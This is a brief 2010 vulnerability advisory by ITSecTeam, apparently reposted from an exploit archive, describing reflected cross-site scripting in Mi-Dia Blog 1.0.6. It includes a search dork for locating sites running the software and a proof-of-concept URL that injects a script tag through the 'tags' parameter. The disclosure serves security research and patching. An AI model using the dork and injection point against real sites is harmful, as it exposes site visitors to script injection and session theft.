Mi-Dia Blog 1.0.6 XSS Vulnerability
Posted on 03 April 2010
=================================== Mi-Dia Blog 1.0.6 XSS Vulnerability =================================== ############################################################################## #Title: Mi-Dia Blog 1.0.6 XSS # #Vendor: http://www.mi-dia.co.uk # #Dork: "Powered by Mi-Dia Blog v1.0.6" # ############################################################################## #AUTHOR: ITSecTeam # #Email: Bug@ITSecTeam.com # #Website: http://www.itsecteam.com # #Forum : http://forum.ITSecTeam.com # #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability33.htm # #Thanks: r3dm0v3, Pejvak, am!rkh@n & everyone in the world :D # ############################################################################## #POC:######################################################################### http://site.com/?s=search&tags=<script>alert(1)</script> # Inj3ct0r.com [2010-04-03]
